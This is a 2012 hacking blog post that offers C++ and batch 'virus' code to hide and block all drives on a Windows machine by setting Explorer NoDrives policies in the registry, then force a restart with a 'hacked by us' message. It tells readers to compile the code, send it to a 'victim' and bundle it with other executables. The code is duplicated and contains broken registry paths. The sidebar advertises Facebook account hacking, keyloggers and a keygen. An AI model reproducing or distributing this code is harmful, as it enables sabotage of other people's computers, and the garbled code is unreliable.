Search This Blog
Categories
- Games (1)
- Hack Facebook (7)
- Hacker News (3)
- Internet Hacks (2)
- Keylogger (4)
- Password Cracking (1)
- Programming (3)
- Security Tips (2)
- Tools (3)
Blog Archive
-
2012
(24)
-
October
(24)
- Facebook Hack | How to Hack a Facebook account pas...
- How to hack someone’s Facebook account: Hacking Fa...
- Facebook hack: Browser Hack for Facebook
- Facebook Status Update With XFBML Injection-Facebo...
- Facebook Button Hacking Trick
- Learn To create Keylogger using C++|Basic Hacking ...
- KeyCobra Hardware Keyloggers
- Scan files for Virus and Keylogger in Online for f...
- Sniperspy-Best and Advanced Remote Keylogger Download
- Create a virus to create a infinite folder in a drive
- Virus to Delete mouse,explore,logoff using Batch P...
- C++ ,Batch Virus code to disable All Hard disk
- 12 Child Porn websites take down by Anonymous
- Punto.pe, Peru Domain provider hacked and data lea...
- Anonymous Hackers claims responsibility for HSBC c...
- 6 Web Security Risks of Not Monitoring Internet Ac...
- Blackhat SEO poisoning attacks
- Nicole's baby kicking video is a Facebook scam
- New Facebook Hacking Tool ~Stealing Facebook profi...
- How to Use Ravan for Password Cracking?
- Portspoof : Service Signature Obfuscator
- Download Backtrack 5 R3 , a Penetration testing linux
- jSQL Injection, a Java GUI for database injection
- EA Games Generic Multi KeyGen v214
-
October
(24)
Ads 468x60px
Social Icons
?
+
X
Recommended for you
Loading..
loading
Featured Posts
Saturday, October 20, 2012
C++ ,Batch Virus code to disable All Hard disk
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also.
C++ Virus Code :
Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.
Batch Virus Code Creation:
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim
C++ Virus Code :
#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim
Labels:Programming
Subscribe to:
Post Comments
(Atom)
Archives
-
▼
2012
(24)
-
▼
October
(24)
- Facebook Hack | How to Hack a Facebook account pas...
- How to hack someone’s Facebook account: Hacking Fa...
- Facebook hack: Browser Hack for Facebook
- Facebook Status Update With XFBML Injection-Facebo...
- Facebook Button Hacking Trick
- Learn To create Keylogger using C++|Basic Hacking ...
- KeyCobra Hardware Keyloggers
- Scan files for Virus and Keylogger in Online for f...
- Sniperspy-Best and Advanced Remote Keylogger Download
- Create a virus to create a infinite folder in a drive
- Virus to Delete mouse,explore,logoff using Batch P...
- C++ ,Batch Virus code to disable All Hard disk
- 12 Child Porn websites take down by Anonymous
- Punto.pe, Peru Domain provider hacked and data lea...
- Anonymous Hackers claims responsibility for HSBC c...
- 6 Web Security Risks of Not Monitoring Internet Ac...
- Blackhat SEO poisoning attacks
- Nicole's baby kicking video is a Facebook scam
- New Facebook Hacking Tool ~Stealing Facebook profi...
- How to Use Ravan for Password Cracking?
- Portspoof : Service Signature Obfuscator
- Download Backtrack 5 R3 , a Penetration testing linux
- jSQL Injection, a Java GUI for database injection
- EA Games Generic Multi KeyGen v214
-
▼
October
(24)
Blogroll
Top Read
-
EA Games Generic Multi KeyGen v214 .exe File Format (KeyGen) EA Games Keygen is a powerful Keygen, that can generate product keys for...
-
The Anonymous Hackers collective claimed that they take down 12 child pornography websites. They found that illegal contents are being host...
-
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batc...
-
We discussed about Facebook hacking software – Facebook Freezer in my earlier article How to hack someones Facebook account . But, Faceboo...
-
The portspoof program is designed to enhance OS security through emulation of legitimate service signatures on otherwise closed ports. The g...
-
BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in B...
-
Internet access is one of the most important things you can provide to your users. It’s a morale booster, it helps them do their job (for s...
-
An easy to use SQL injection tool for retrieving database informations from a distant server. jSQL Injection features: GET, POST, he...
-
Sniperspy is best and Advanced Keylogger. It allows you to monitor your victim remotely like a television. No physical installation co...
-
Today i am going to introduce KeyCobra Hardware Keyloggers. KeyCobra provides three type of Hardware Keyloggers. They are Wi-Fi Hardwa...
0 comments:
Post a Comment